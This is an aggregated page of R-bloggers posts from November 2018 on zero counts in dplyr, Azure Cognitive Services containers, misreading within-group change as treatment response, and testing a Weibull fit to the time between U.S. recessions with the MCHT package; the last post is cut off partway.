
Zero Counts in dplyr

Mon, 11/19/2018 - 22:53

(This article was first published on R on kieranhealy.org, and kindly contributed to R-bloggers)

Here’s a feature of dplyr that occasionally bites me (most recently while making these graphs). It’s about to change mostly for the better, but is also likely to bite me again in the future. If you want to follow along there’s a GitHub repo with the necessary code and data.

Say we have a data frame or tibble and we want to get a frequency table or set of counts out of it. In this case, each row of our data is a person serving a congressional term for the very first time, for the years 2013 to 2019. We have information on the term year, the party of the representative, and whether they are a man or a woman.

library(tidyverse)

## Hex colors for sex
sex_colors <- c("#E69F00", "#993300")

## Hex color codes for Dem Blue and Rep Red
party_colors <- c("#2E74C0", "#CB454A")

## Group labels
mf_labs <- tibble(M = "Men", F = "Women")

theme_set(theme_minimal())

## Character vectors only, by default
df <- read_csv("data/fc_sample.csv")

df
#> # A tibble: 280 x 4
#>      pid start_year party      sex
#>    <dbl> <date>     <chr>      <chr>
#>  1  3160 2013-01-03 Republican M
#>  2  3161 2013-01-03 Democrat   F
#>  3  3162 2013-01-03 Democrat   M
#>  4  3163 2013-01-03 Republican M
#>  5  3164 2013-01-03 Democrat   M
#>  6  3165 2013-01-03 Republican M
#>  7  3166 2013-01-03 Republican M
#>  8  3167 2013-01-03 Democrat   F
#>  9  3168 2013-01-03 Republican M
#> 10  3169 2013-01-03 Democrat   M
#> # ... with 270 more rows

When we load our data into R with read_csv, the columns for party and sex are parsed as character vectors. If you’ve been around R for any length of time, and especially if you’ve worked in the tidyverse framework, you’ll be familiar with the drumbeat of “stringsAsFactors=FALSE”, by which we avoid classing character variables as factors unless we have a good reason to do so (there are several good reasons), and we don’t do so by default. Thus our df tibble shows us <chr> rather than <fct> for party and sex.

Now, let’s say we want a count of the number of men and women elected by party in each year. (Congressional elections happen every two years.) We write a little pipeline to group the data by year, party, and sex, count up the numbers, and calculate a frequency that’s the proportion of men and women elected that year within each party. That is, the frequencies of M and F will sum to 1 for each party in each year.

df %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N))
#> # A tibble: 14 x 5
#> # Groups:   start_year, party [8]
#>    start_year party      sex       N   freq
#>    <date>     <chr>      <chr> <int>  <dbl>
#>  1 2013-01-03 Democrat   F        21 0.362
#>  2 2013-01-03 Democrat   M        37 0.638
#>  3 2013-01-03 Republican F         8 0.101
#>  4 2013-01-03 Republican M        71 0.899
#>  5 2015-01-03 Democrat   M         1 1
#>  6 2015-01-03 Republican M         5 1
#>  7 2017-01-03 Democrat   F         6 0.24
#>  8 2017-01-03 Democrat   M        19 0.76
#>  9 2017-01-03 Republican F         2 0.0667
#> 10 2017-01-03 Republican M        28 0.933
#> 11 2019-01-03 Democrat   F        33 0.647
#> 12 2019-01-03 Democrat   M        18 0.353
#> 13 2019-01-03 Republican F         1 0.0323
#> 14 2019-01-03 Republican M        30 0.968

You can see that, in 2015, neither party had a woman elected to Congress for the first time. Thus, the freq is 1 in row 5 and row 6. But you can also see that, because there are no observed Fs in 2015, they don’t show up in the table at all. The zero values are dropped. These rows, call them 5' and 6', don’t appear:

#>    start_year party      sex       N  freq
#> 5' 2015-01-03 Democrat   F         0     0
#> 6' 2015-01-03 Republican F         0     0

How is that going to bite us? Let’s add some graphing instructions to the pipeline, first making a stacked column chart:

df %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N)) %>%
  ggplot(aes(x = start_year, y = freq, fill = sex)) +
  geom_col() +
  scale_y_continuous(labels = scales::percent) +
  scale_fill_manual(values = sex_colors, labels = c("Women", "Men")) +
  labs(x = "Year", y = "Percent", fill = "Group") +
  facet_wrap(~ party)

ggsave("figures/df_chr_col.png")

Stacked column chart based on character-encoded values.

That looks fine. You can see in each panel the 2015 column is 100% Men. If we were working on this a bit longer we’d polish up the x-axis so that the dates were centered under the columns. But as an exploratory plot it’s fine.
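One way to do that polish (a sketch of one option, not from the original post; it assumes the lubridate package is installed, which ships with the tidyverse) is to treat each term's start year as a discrete label, so every column sits centered under its year:

df %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N)) %>%
  ## convert the date to a discrete year label before plotting
  ggplot(aes(x = factor(lubridate::year(start_year)), y = freq, fill = sex)) +
  geom_col() +
  scale_y_continuous(labels = scales::percent) +
  scale_fill_manual(values = sex_colors, labels = c("Women", "Men")) +
  labs(x = "Year", y = "Percent", fill = "Group") +
  facet_wrap(~ party)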

But let’s say that, instead of a column plot, you looked at a line plot. This would be a natural thing to do given that time is on the x-axis, so you’re looking at a trend, albeit one over a small number of years.

df %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N)) %>%
  ggplot(aes(x = start_year, y = freq, color = sex)) +
  geom_line(size = 1.1) +
  scale_y_continuous(labels = scales::percent) +
  scale_color_manual(values = sex_colors, labels = c("Women", "Men")) +
  guides(color = guide_legend(reverse = TRUE)) +
  labs(x = "Year", y = "Percent", color = "Group") +
  facet_wrap(~ party)

ggsave("figures/df_chr_line.png")

A line graph based on character-encoded variables for party and sex. The trend line for Women joins up the observed (or rather, the included) values, which don’t include the zero values for 2015.

That’s not right. The line segments join up the data points in the summary tibble, but because those don’t include the zero-count rows in the case of women, the lines join the 2013 and 2017 values directly. So we miss that the count (and thus the frequency) went to zero in that year.

This issue has been recognized in dplyr for some time. It happened whether your data was encoded as character or as a factor. There’s a huge thread about it on GitHub going back to 2014. In the upcoming version 0.8 release of dplyr, the behavior for zero-count rows will change, but as far as I can make out it will change for factors only. Let’s see what happens when we change the encoding of our data frame. We’ll make a new one, called df_f.

df_f <- df %>% modify_if(is.character, as.factor)

df_f %>%
  group_by(start_year, party, sex) %>%
  tally()
#> # A tibble: 16 x 4
#> # Groups:   start_year, party [8]
#>    start_year party      sex       n
#>    <date>     <fct>      <fct> <int>
#>  1 2013-01-03 Democrat   F        21
#>  2 2013-01-03 Democrat   M        37
#>  3 2013-01-03 Republican F         8
#>  4 2013-01-03 Republican M        71
#>  5 2015-01-03 Democrat   F         0
#>  6 2015-01-03 Democrat   M         1
#>  7 2015-01-03 Republican F         0
#>  8 2015-01-03 Republican M         5
#>  9 2017-01-03 Democrat   F         6
#> 10 2017-01-03 Democrat   M        19
#> 11 2017-01-03 Republican F         2
#> 12 2017-01-03 Republican M        28
#> 13 2019-01-03 Democrat   F        33
#> 14 2019-01-03 Democrat   M        18
#> 15 2019-01-03 Republican F         1
#> 16 2019-01-03 Republican M        30

Now we have party and sex encoded as unordered factors. This time, our zero rows are present (here as rows 5 and 7). The grouping and summarizing operation has preserved all the factor values by default, instead of dropping the ones with no observed values in any particular year. Let’s run our line graph code again:

df_f %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N)) %>%
  ggplot(aes(x = start_year, y = freq, color = sex)) +
  geom_line(size = 1.1) +
  scale_y_continuous(labels = scales::percent) +
  scale_color_manual(values = sex_colors, labels = c("Women", "Men")) +
  guides(color = guide_legend(reverse = TRUE)) +
  labs(x = "Year", y = "Percent", color = "Group") +
  facet_wrap(~ party)

ggsave("figures/df_fac_line.png")

A line graph based on factor-encoded variables for party and sex. Now the trend line for Women does include the zero values, as they are preserved in the summary.

Now the trend line goes to zero, as it should. (And by the same token the trend line for Men goes to 100%.)

What if we want to keep working with our variables encoded as characters rather than factors? There is a workaround, using the complete() function. You will need to ungroup() the data after summarizing it, and then use complete() to fill in the implicit missing values. You have to re-specify the grouping structure for complete, and then tell it what you want the fill-in value to be for your summary variables. In this case it’s zero.

## using df again, with <chr> variables
df %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N)) %>%
  ungroup() %>%
  complete(start_year, party, sex,
           fill = list(N = 0, freq = 0))
#> # A tibble: 16 x 5
#>    start_year party      sex       N   freq
#>    <date>     <chr>      <chr> <dbl>  <dbl>
#>  1 2013-01-03 Democrat   F        21 0.362
#>  2 2013-01-03 Democrat   M        37 0.638
#>  3 2013-01-03 Republican F         8 0.101
#>  4 2013-01-03 Republican M        71 0.899
#>  5 2015-01-03 Democrat   F         0 0
#>  6 2015-01-03 Democrat   M         1 1
#>  7 2015-01-03 Republican F         0 0
#>  8 2015-01-03 Republican M         5 1
#>  9 2017-01-03 Democrat   F         6 0.24
#> 10 2017-01-03 Democrat   M        19 0.76
#> 11 2017-01-03 Republican F         2 0.0667
#> 12 2017-01-03 Republican M        28 0.933
#> 13 2019-01-03 Democrat   F        33 0.647
#> 14 2019-01-03 Democrat   M        18 0.353
#> 15 2019-01-03 Republican F         1 0.0323
#> 16 2019-01-03 Republican M        30 0.968

If we re-draw the line plot with the ungroup() ... complete() step included, we’ll get the correct output in our line plot, just as in the factor case.

df %>%
  group_by(start_year, party, sex) %>%
  summarize(N = n()) %>%
  mutate(freq = N / sum(N)) %>%
  ungroup() %>%
  complete(start_year, party, sex,
           fill = list(N = 0, freq = 0)) %>%
  ggplot(aes(x = start_year, y = freq, color = sex)) +
  geom_line(size = 1.1) +
  scale_y_continuous(labels = scales::percent) +
  scale_color_manual(values = sex_colors, labels = c("Women", "Men")) +
  guides(color = guide_legend(reverse = TRUE)) +
  labs(x = "Year", y = "Percent", color = "Group") +
  facet_wrap(~ party)

ggsave("figures/df_chr_line_2.png")

Same as before, but based on the character-encoded version.

The new zero-preserving behavior of group_by() for factors will show up in the upcoming version 0.8 of dplyr. It’s already there in the development version if you like to live dangerously. In the meantime, if you want your frequency tables to include zero counts, then make sure you ungroup() and then complete() the summary tables.
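A more compact route to the same table (an alternative sketch, not from the original post) is to let count() do the grouping and tallying and then complete() the result:

## count() is shorthand for group_by() + tally(); complete() then restores the
## zero-count combinations before the frequencies are computed.
df %>%
  count(start_year, party, sex) %>%
  complete(start_year, party, sex, fill = list(n = 0)) %>%
  group_by(start_year, party) %>%
  mutate(freq = n / sum(n)) %>%
  ungroup()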


To leave a comment for the author, please follow the link and comment on their blog: R on kieranhealy.org.

Cognitive Services in Containers

Mon, 11/19/2018 - 21:41

(This article was first published on Revolutions, and kindly contributed to R-bloggers)

I've posted several examples here of using Azure Cognitive Services for data science applications. You can upload an image or video to the service and extract information about faces and emotions, generate a caption describing a scene from a provided photo, or speak written text in a natural voice. (If you haven't tried the Cognitive Services tools yet, you can try them out in a browser using the instructions in this notebook.)

But what if you can't upload an image or text to the cloud? Sending data outside your network might be subject to regulatory or privacy policies. And if you could analyze the images or text locally, your application could benefit from reduced latency and bandwidth. 

Now, several of the Azure Cognitive Services APIs are available as Docker containers: you can download a container that provides the exact same APIs as the cloud-based services, and run it on a local Linux-based server or edge device. Images and text are processed directly in the container and never sent to the cloud. A connection to Azure is required only for billing, which is at the same rate as the cloud-based services (including a free tier).

The services now available as containers are:

You can learn more about Cognitive Services in the video below. (The information about the new container support starts at 11:20.)

You can also find detailed information about the Cognitive Services in containers in the blog post linked below.

Microsoft Azure blog: Getting started with Azure Cognitive Services in containers


To leave a comment for the author, please follow the link and comment on their blog: Revolutions.

Change over time is not “treatment response”

Mon, 11/19/2018 - 19:20

(This article was first published on R Psychologist - R, and kindly contributed to R-bloggers)

This will be a non-technical post illustrating the problems with identifying treatment responders or non-responders using inappropriate within-group analyses. Specifically, I will show why it is pointless to try to identify a subgroup of non-responders using a naïve analysis of data from one treatment group only, even though we have weekly measures over time.

This type of unwarranted and misleading causal language is surprisingly common. You see this type of language even when the data comes from an RCT, often in secondary analyses of mediators, predictors, or in even trendier studies where the authors have a strong urge to mix omics (e.g., genomics) and artificial intelligence/machine learning for vague reasons.

Defining treatment response

When we talk about “treatment response” we usually mean the causal estimand, i.e., the counterfactual comparison of the effect of receiving the treatment versus not receiving the treatment. Deep down we all know that a treatment response is a relative contrast, and not simply a patient’s change from pre to posttest. We can (usually) only estimate the effect of the treatment on the group level, by randomizing patients to a treatment or a control group and estimating the average treatment effect by comparing the expected outcome in the two groups. The rate at which we tend to “forget” this basic knowledge seems directly related to our drive to publish in high impact journals.
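In symbols (a standard formulation of the point above, not spelled out in the original post), the individual and average treatment effects are

$$ \tau_i = Y_i(1) - Y_i(0), \qquad \mathrm{ATE} = E[Y(1) - Y(0)] = E[Y \mid T = 1] - E[Y \mid T = 0] \;\text{(under randomization)}, $$

whereas a patient's observed pre-post change, $Y_{i,\mathrm{post}} - Y_{i,\mathrm{pre}}$, mixes $\tau_i$ together with whatever change would have happened without treatment.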

Simulating the problem

# Packages used
library(tidyverse)
library(powerlmm) # dev version
library(ggrepel)

I will use powerlmm to simulate some longitudinal treatment data. In this setup, the control group has a ~40% reduction in symptoms at posttest, which in this case would give a Cohen’s d of 0.5. And the actual treatment effect is d = 0.5, i.e., a 7 point difference at posttest between the treatment and control group. These would not be surprising numbers in some psychiatric trials.

p <- study_parameters(design = study_design(),
                      n1 = 11,
                      n2 = 200,
                      fixed_intercept = 17,
                      fixed_slope = -7/10,
                      icc_pre_subject = 0.5,
                      var_ratio = 0.03,
                      cor_subject = -0.5,
                      effect_size = cohend(-0.5))

plot(p, type = "trend", RE = FALSE) +
  theme_minimal() +
  scale_color_manual(values = c("Control" = "gray66", "Treatment" = "#0984e3"))

Creating the subgroups

We want to add a subgroup of “non-responders”, and we do this by simply assigning subjects to group A or B based on their latent random slopes. This is easily done using the data_transform argument. The non-responders have subject-specific slopes 1 SD above the mean. Obviously, this is a bit simplistic, but it gets the point across.

add_subgroup <- function(d) {
  # 1.73 is the slope SD
  d$subgroup <- ifelse(d$subject_slope < 1.73, "B", "A")
  d$subgroup <- factor(d$subgroup)
  d
}

If we plot one realization of the latent slopes from this data generating process, we get this figure.



set.seed(1234)
p0 <- p %>%
  update(n2 = 1000) %>%
  simulate_data %>%
  add_subgroup() %>%
  mutate(mu = fixed_intercept + subject_intercept + (fixed_slope + subject_slope) * time) %>%
  ggplot(aes(time, mu, group = subject)) +
  geom_line(aes(color = subgroup, alpha = subgroup)) +
  geom_text_repel(data = data.frame(mu = 25, time = 5),
                  aes(group = NULL),
                  direction = "y",
                  ylim = c(45, NA),
                  point.padding = 1,
                  arrow = arrow(length = unit(0.02, "npc")),
                  label.size = NA,
                  segment.color = "gray35",
                  label = "A subgroup with participants that\n tend to decline over time") +
  scale_color_manual(values = c("B" = "gray66", "A" = "#0984e3")) +
  scale_alpha_manual(values = c("B" = 0.25, "A" = 0.75)) +
  theme_minimal() +
  theme(legend.position = "bottom") +
  labs(title = "Treatment group")

A naïve analysis: Using only the treatment group

Let’s say we have access to data from a clinic that carefully monitors their patients’ change during treatment (e.g., IAPT). The sample size is large, and we want to identify if there is a subgroup of patients that are “non-responders”. There is no control group, but we have weekly measures during the treatment (there is also perfect adherence and no dropout…), and we also have access to some cool baseline marker data that will impress reviewers and enable “personalized treatment selection for non-responding patients”. So what we do is run an analysis to identify if there is an interaction between our proposed subgroup variable and change over time. Let’s run such a simulation.

add_subgroup_tx_only <- function(d) {
  d$subgroup <- ifelse(d$subject_slope < 1.73, "B", "A")
  d$subgroup <- factor(d$subgroup)
  d <- dplyr::filter(d, treatment == 1)
  d
}

f <- sim_formula("y ~ subgroup * time + (1 + time | subject)",
                 data_transform = add_subgroup_tx_only,
                 test = c("time"))

res <- simulate(p, formula = f, nsim = 5000, cores = 16)
summary(res)
## Model: default
##
## Random effects
##
##          parameter  M_est theta est_rel_bias prop_zero is_NA
##  subject_intercept  89.00 100.0        -0.11         0     0
##      subject_slope   1.70   3.0        -0.44         0     0
##              error 100.00 100.0         0.00         0     0
##        cor_subject  -0.39  -0.5        -0.22         0     0
##
## Fixed effects
##
##       parameter M_est theta M_se SD_est Power Power_bw Power_satt
##     (Intercept)   9.3  17.0 2.00   1.90  1.00        .        NaN
##       subgroupB   9.1     . 2.10   2.10  0.99        .        NaN
##            time   1.2  -0.7 0.29   0.22  1.00        1        NaN
##  subgroupB:time  -3.1     . 0.31   0.25  1.00        .        NaN
## ---
## Number of simulations: 5000 | alpha: 0.05
## Time points (n1): 11
## Subjects per cluster (n2 x n3): 200 (treatment)
##                                 200 (control)
## Total number of subjects: 400
## ---
## At least one of the models applied a data transformation during simulation,
## summaries that depend on the true parameter values will no longer be correct,
## see 'help(summary.plcp_sim)'

We see that we tend to identify a powerful subgroup effect: participants in the A subgroup tend to change less and even deteriorate during the treatment. Surely, this is substantial proof that there is a differential treatment response and that these patients did not respond to the treatment? I’m sure you know the answer, but to be sure let us also run the simulation where we have access to some similar data from another source that actually randomized their patients to receive either the treatment or a placebo control. What we want now is to identify an interaction between the subgroup variable and the treatment-by-time interaction. So we update the simulation formula.

f2 <- sim_formula("y ~ subgroup * time * treatment + (1 + time | subject)",
                  data_transform = add_subgroup)

res2 <- simulate(p, formula = f2, nsim = 5000, cores = 16)
summary(res2)
## Model: default
##
## Random effects
##
##          parameter M_est theta est_rel_bias prop_zero is_NA
##  subject_intercept  89.0 100.0        -0.11         0     0
##      subject_slope   1.7   3.0        -0.44         0     0
##              error 100.0 100.0         0.00         0     0
##        cor_subject  -0.4  -0.5        -0.21         0     0
##
## Fixed effects
##
##                 parameter M_est theta M_se SD_est Power Power_bw Power_satt
##               (Intercept)  9.40 17.00 2.00   1.90  1.00        .        NaN
##                 subgroupB  9.00     . 2.10   2.10  0.99        .        NaN
##                      time  1.90 -0.70 0.29   0.22  1.00        .        NaN
##                 treatment -0.01  0.00 2.80   2.70  0.04        .        NaN
##            subgroupB:time -3.10     . 0.31   0.26  1.00        .        NaN
##       subgroupB:treatment  0.02     . 3.00   3.00  0.04        .        NaN
##            time:treatment -0.71 -0.71 0.41   0.32  0.39     0.39        NaN
##  subgroupB:time:treatment  0.00     . 0.44   0.36  0.02        .        NaN
## ---
## Number of simulations: 5000 | alpha: 0.05
## Time points (n1): 11
## Subjects per cluster (n2 x n3): 200 (treatment)
##                                 200 (control)
## Total number of subjects: 400
## ---
## At least one of the models applied a data transformation during simulation,
## summaries that depend on the true parameter values will no longer be correct,
## see 'help(summary.plcp_sim)'

Using the appropriate estimand of a subgroup effect we now get the “disappointing” result that there is absolutely no difference in treatment response for participants in subgroup A or B. The coefficient subgroupB:time:treatment is zero on average. To make it even more clear what is going on let us also plot the trends.



# Calculate trends
tmp <- expand.grid(time = 0:10, subgroup = c("A", "B"))
X <- model.matrix(~subgroup * time, data = tmp)
b_hat <- summary(res)$summary$default$FE[, "M_est"]
tmp$y <- c(X %*% b_hat)
TE <- tmp %>%
  filter(time == 10) %>%
  spread(subgroup, y)

# Plot treatment group only
p0 <- ggplot(tmp, aes(time, y, group = subgroup, linetype = subgroup, color = subgroup)) +
  geom_line(aes(size = subgroup)) +
  annotate("rect", xmin = 10, xmax = Inf, ymin = -Inf, ymax = Inf, fill = "white") +
  geom_segment(data = TE,
               aes(xend = time, y = A, yend = B, linetype = NULL, color = NULL, group = NULL),
               arrow = arrow(length = unit(0.02, "npc"), ends = "both")) +
  geom_text_repel(data = filter(tmp, time == 10),
                  alpha = 0.77,
                  aes(y = y, label = paste("Subgroup: ", subgroup), group = NULL),
                  direction = "x",
                  xlim = c(10.5, NA)) +
  geom_text_repel(data = filter(tmp, time == 6, subgroup == "A"),
                  alpha = 0.77,
                  aes(y = y, label = "By only analyzing change within the treatment group\nwe get the impression that we can use Subgroup A to identify 'non-responders'", group = NULL, color = NULL),
                  direction = "y",
                  arrow = arrow(length = unit(0.02, "npc")),
                  point.padding = 1,
                  ylim = c(25, NA)) +
  geom_text(data = TE,
            aes(group = NULL, color = NULL, linetype = NULL, y = (A + B)/2, label = paste("A - B:", round(A - B, 0))),
            point.padding = 1,
            direction = "x",
            nudge_x = 0.5,
            hjust = 0,
            arrow = arrow(length = unit(0.02, "npc")),
            xlim = c(10.5, NA),
            label.size = NA,
            segment.color = "gray35") +
  theme_minimal() +
  theme(legend.position = "none") +
  scale_color_manual(values = c("B" = "gray50", "A" = "#00b894")) +
  scale_size_manual(values = c("B" = 0.75, "A" = 1)) +
  coord_cartesian(xlim = c(0, 14), ylim = c(0, 30)) +
  labs(title = "Treatment group only")

# Calculate trends for RCT
tmp <- expand.grid(time = 0:10,
                   treatment = factor(0:1, labels = c("Control", "Treatment")),
                   subgroup = c("A", "B"))
X <- model.matrix(~subgroup * time * treatment, data = tmp)
b_hat <- summary(res2)$summary$default$FE[, "M_est"]
tmp$y <- c(X %*% b_hat)
TE <- tmp %>%
  filter(time == 10) %>%
  spread(treatment, y)

# Plot RCT
p1 <- ggplot(tmp, aes(time, y, group = interaction(subgroup, treatment), color = treatment, linetype = subgroup)) +
  geom_line(aes(size = treatment)) +
  annotate("rect", xmin = 10, xmax = Inf, ymin = -Inf, ymax = Inf, fill = "white") +
  geom_segment(data = TE,
               aes(xend = time, y = Treatment, yend = Control, group = subgroup, linetype = NULL, color = NULL),
               arrow = arrow(length = unit(0.02, "npc"), ends = "first")) +
  geom_text_repel(data = filter(tmp, time == 6, subgroup == "A", treatment == "Treatment"),
                  alpha = 0.77,
                  aes(y = y, label = "In the correct analysis we see that the 'non-responders'\nactually improved just as much as the 'responders'", group = NULL, color = NULL),
                  direction = "y",
                  arrow = arrow(length = unit(0.02, "npc")),
                  point.padding = 1,
                  ylim = c(25, NA),
                  xlim = c(NA, 8)) +
  geom_text_repel(data = filter(tmp, time == 10),
                  alpha = 0.77,
                  aes(y = y, label = paste(treatment, ": ", subgroup), color = treatment, group = NULL),
                  direction = "x",
                  xlim = c(10.5, NA)) +
  geom_text(data = TE,
            aes(group = NULL, color = NULL, linetype = NULL, y = (Treatment + Control)/2, label = round(Treatment - Control, 0)),
            point.padding = 1,
            direction = "x",
            nudge_x = 0.5,
            arrow = arrow(length = unit(0.02, "npc")),
            xlim = c(10.5, NA),
            label.size = NA,
            segment.color = "gray35") +
  theme_minimal() +
  theme(legend.position = "none") +
  scale_color_manual(values = c("Control" = "gray66", "Treatment" = "#0984e3")) +
  scale_size_manual(values = c("Control" = 0.75, "Treatment" = 1)) +
  coord_cartesian(xlim = c(0, 14), ylim = c(0, 30)) +
  labs(title = "Treatment and control")

We see that the “non-responders” actually improved just as much as the “responders” when compared to the control group. The effect from the naïve within-group analysis clearly confounds treatment response with just “change”. You might think that there is no reason why Subgroup A would start deteriorating just as they enter the study. It is easy to think of different explanations for this; one explanation might be that the marker we used to identify the subgroup is related to some personality trait that makes participants more likely to seek treatment when they feel “good enough to start treatment”. It is not uncommon to hear such reasoning. During the study period these patients will tend to regress toward their typical symptom level, but the deterioration is somewhat slowed down thanks to the treatment. Patients in subgroup B, on the other hand, seek treatment because they have felt worse than usual for a period. So our marker for “treatment response” does not identify responders and non-responders; it simply identifies patients on different trajectories, i.e., it is a prognostic marker.

The point of this post is not just semantics (treatment response versus change). The take-home message is important: by using the naïve analysis and the unwarranted causal language, we risk spreading the misinformation that patients belonging to subgroup A do not benefit from the treatment, when in fact they do. This risks creating an unnecessary stigma for a patient group that might already be seen as “difficult”, and inspiring suboptimal “personalized” treatments that could be less likely to work.


To leave a comment for the author, please follow the link and comment on their blog: R Psychologist - R.

The Distribution of Time Between Recessions: Revisited (with MCHT)

Mon, 11/19/2018 - 17:00

(This article was first published on R – Curtis Miller's Personal Website, and kindly contributed to R-bloggers)

Introduction

These past few weeks I’ve been writing about a new package I created, MCHT. Those blog posts were basically tutorials demonstrating how to use the package. (Read the first in the series here.) I’m done for now explaining the technical details of the package. Now I’m going to use the package for the purpose I initially had: exploring the distribution of time separating U.S. economic recessions.

I wrote about this before. I suggested that the distribution of times between recessions can be modeled with a Weibull distribution, and based on this, a recession was likely to occur prior to the 2020 presidential election.
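For concreteness, here is the shape of that back-of-the-envelope calculation (a sketch with made-up numbers; the shape, scale, and elapsed time below are illustrative assumptions, not the estimates from the earlier post):

# P(a recession starts within the next t years, given s years have already
# passed since the last one), under a Weibull model for the time between recessions
shape <- 2.5   # hypothetical shape estimate (> 1 implies "memory")
scale <- 7     # hypothetical scale estimate, in years
s <- 9         # years elapsed since the last recession (assumed)
t <- 2         # horizon of interest, e.g. up to the 2020 election
1 - pweibull(s + t, shape, scale, lower.tail = FALSE) /
    pweibull(s, shape, scale, lower.tail = FALSE)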

This claim raised eyebrows, and I want to respond to some of the comments made. Now, I would not be surprised to find this post the subject of an R1 on r/badeconomics, and I hope that no future potential employer finds this (or my previous) post, reads it, and then decides I’m an idiot and denies me a job. I don’t know enough to dogmatically subscribe to the idea but I do want to explore it. Blog posts are not journal articles, and I think this is a good space for me to make arguments that could be wrong and then see how others more intelligent than myself respond. The act of keeping a blog is good for me and my learning (which never ends).

Past Responses

My previous post on the distribution of times between recessions was… controversial. Have a look at the comments section of the original article and the comments of this reddit thread. Here is my summarization of some of the responses:

  1. There was no statistical test for the goodness-of-fit of the Weibull distribution.
  2. No data generating process (DGP) was proposed, in the sense that there’s no explanation for why the Weibull distribution would be appropriate, or the economic processes that produce memory in the distribution of times between recessions.
  3. Isn’t it strange to suggest that other economic variables are irrelevant to when a recession occurs? That seems counterintuitive.
  4. MAGA! (actually there were no MAGAs, thankfully)

Then there was this comment, by far the harshest one, by u/must_not_forget_pwd:

The idea that recessions are dependent on time is genuinely laughable. It is an idea that seems to be getting some traction in the chattering classes, who seem more interested in spewing forth political rantings rather than even the semblance of serious analysis. This also explains why no serious economist talks about the time and recession relationship.

The lack of substance behind this time and recession idea is revealed by asking some very basic questions and having a grasp of some basic data. If recessions were so predictable, wouldn’t recessions be easy to prevent? Monetary and fiscal policies could be easily manipulated so as to engineer a persistent boom.

Also, if investors could correctly predict the state of the economy it would be far easier for them to determine when to invest and to capture the subsequent boom. That is, invest in the recession, when goods and services are cheaper and have the project come on stream during the following boom and make a massive profit. If enough investors acted like this, there would be no recession to begin with due to the increase in investment.

Finally, have a look at the growth of other countries. Australia hasn’t had two consecutive quarters of negative growth since the 1990-91 recession. Sure there have been hiccups along the way for Australia, such as the Asian Financial Crisis, the introduction of the GST, a US recession in the early 2000s, and more recently the Global Financial Crisis. Yet, Australia has managed to persist without a recession despite the passage of time. No one in Australia would take you seriously if you said that recessions were time dependent.

If these “chattering classes” were interested in even half serious analysis of the US economy, while still wanting to paint a bleak picture, they could very easily look at what is going on right now. Most economists have the US economy growing above trend. This can be seen in the low unemployment rate and that inflation is starting to pickup. Sure wages growth is subdued, but wages growth should be looking to pickup anytime now.

However, during this period the US government is injecting a large amount of fiscal stimulus into the US economy through tax cuts. Pumping large amounts of cash into the economy during a boom isn’t exactly a good thing to do and is a great way to overheat the economy and bring about higher inflation. This higher inflation would then cause the US Federal Reserve to react by increasing interest rates. This in turn could spark a US recession.

Instead of this very simple and defensible story that requires a little bit of homework, we get subjected to this nonsense that recessions are linked to time. I think it’s time that people call out as nonsense the “analysis” that this blog post has.

TL;DR: The idea that recessions are dependent on time is dumb, and if recessions were so easy to predict would mean that recessions wouldn’t exist. This doesn’t mean that a US recession couldn’t happen within the next few years, because it is easy to see how one could occur.

I think that the tone of this message could have been… nicer. That said, I generally welcome direct, harsh criticism, as I often learn a lot from it, or at least am given a lot to think about.

So let’s discuss these comments.

Goodness of Fit of the Weibull Distribution

First, a statistical test for the goodness of fit of the Weibull distribution. I personally was satisfied looking at the plots I made, but some people want a statistical test. The test that comes to mind is the Kolmogorov-Smirnov test, and R does support the simplest version of this test via ks.test(), but when you don’t know all of the parameters of the distribution assumed under the null hypothesis, then you cannot use ks.test(). This is because the test was derived assuming there were no unknown parameters; when nuisance parameters are present and need to be estimated, then the distribution used to compute p-values is no longer appropriate.
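For contrast, here is the naive version that the paragraph above warns about (a sketch with simulated stand-in data, not part of the original analysis): the call runs, but the p-value is computed as if the shape and scale had not been estimated from the same data, so it should not be trusted.

library(fitdistrplus)
set.seed(1)
x <- rweibull(13, shape = 2, scale = 6)   # stand-in data for illustration
param <- coef(fitdist(x, "weibull"))      # estimate the nuisance parameters
# Plugging the estimates in as if they were known true values
ks.test(x, pweibull, shape = param[["shape"]], scale = param[["scale"]])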

Good news, though; MCHT allows us to do the test properly! First, let’s get set up.

library(MCHT)
library(doParallel)
library(fitdistrplus)

recessions <- c( 4 +  2/12,  6 +  8/12,  3 + 1/12,  3 +  9/12,  3 + 3/12,
                 2 +  0/12,  8 + 10/12,  3 + 0/12,  4 + 10/12,  1 + 0/12,
                 7 +  8/12, 10 +  0/12,  6 + 1/12)

registerDoParallel(detectCores())

I already demonstrated how to perform a bootstrap version of the Kolmogorov-Smirnov test in one of my blog posts about MCHT, and the code below is basically a direct copy of that code. While the test is not exact, it should be asymptotically appropriate.

ts <- function(x) {
  param <- coef(fitdist(x, "weibull"))
  shape <- param[['shape']]; scale <- param[['scale']]
  ks.test(x, pweibull, shape = shape, scale = scale,
          alternative = "two.sided")$statistic[[1]]
}

rg <- function(x) {
  n <- length(x)
  param <- coef(fitdist(x, "weibull"))
  shape <- param[['shape']]; scale <- param[['scale']]
  rweibull(n, shape = shape, scale = scale)
}

b.wei.ks.test <- MCHTest(test_stat = ts, stat_gen = ts, rand_gen = rg,
                         seed = 123, N = 1000,
                         method = paste("Goodness-of-Fit Test for Weibull",
                                        "Distribution"))

b.wei.ks.test(recessions)
##
##  Goodness-of-Fit Test for Weibull Distribution
##
## data: recessions
## S = 0.11318, p-value = 0.94

The test does not reject the null hypothesis; there isn’t evidence that the data is not following a Weibull distribution (according to that test; read on).

Compare this to the Kolmogorov-Smirnov test checking whether the data follows the exponential distribution.

ts <- function(x) {
  mu <- mean(x)
  ks.test(x, pexp, rate = 1/mu, alternative = "two.sided")$statistic[[1]]
}

rg <- function(x) {
  n <- length(x)
  mu <- mean(x)
  rexp(n, rate = 1/mu)
}

b.ks.exp.test <- MCHTest(ts, ts, rg, seed = 123, N = 1000,
                         method = paste("Goodness-of-Fit Test for Exponential",
                                        "Distribution"))

b.ks.exp.test(recessions)
##
##  Goodness-of-Fit Test for Exponential Distribution
##
## data: recessions
## S = 0.30074, p-value = 0.023

